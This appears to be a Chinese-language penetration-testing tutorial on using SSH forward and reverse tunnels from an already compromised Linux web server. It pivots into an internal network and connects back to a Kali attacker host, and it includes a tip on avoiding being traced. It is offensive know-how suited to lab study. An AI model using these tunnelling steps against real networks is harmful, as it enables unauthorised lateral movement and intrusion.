前言:
这里模拟的一个环境:
kali攻击机------web服务器------内网主机
这里的环境是我们已经入侵到web服务器,并且使用msf在web服务器中植入了木马,我们现在需要通过代理将web作为跳板入侵内网主机。
正向代理:
这里还是接上面的环境,ssh的正向代理,这里遇到的是我们遇到一台对外主机是Linux的主机
然后我们需要通过Linux的主机当跳板去访问内网另一台的主机,这里我们就需要进行ssh的正向代理
方式很简单,我们指定Linux这个已经被我们控制的主机,指定另一台无门无法访问的内网主机的端口
代码语言:javascript
复制
ssh -CNfL 0.0.0.0:8888:192.168.1.222:8080 root@127.0.0.1
这里就是我们可以通过这个我们拿下的这台Linux的8888端口访问内网我们无法访问的222主机的8080端口了
这里最后我们需要输入Linux主机的密码
这样就完成了
我们可以通过访问Linux主机来访问内网主机
反向代理:
反向代理需要我们Linux这个中间人主动去链接黑客主机,这里有两个方式
第一个我们可以使用ssh去将Linux22端口代理给kali主机的2222
代码语言:javascript
复制
ssh -qTfnN -R 2222:127.0.0.1:22 root@kali ip
这里我们需要输入kali的密码(实战中可以使用kali权限较低的账号,方式被反查,或者使用完及时更换密码)
这样我们kali链接自己的2222端口可以直接链接上Linux主机
代码语言:javascript
复制
ssh -p 2222 root@127.0.0.1
第二个我们可以直接将内网服务器指向kali
代码语言:javascript
复制
ssh -qTfnN -R 2222:内网web服务器IP:8080 root@kali IP
这样我们就可以直接使用kali访问内网的web网站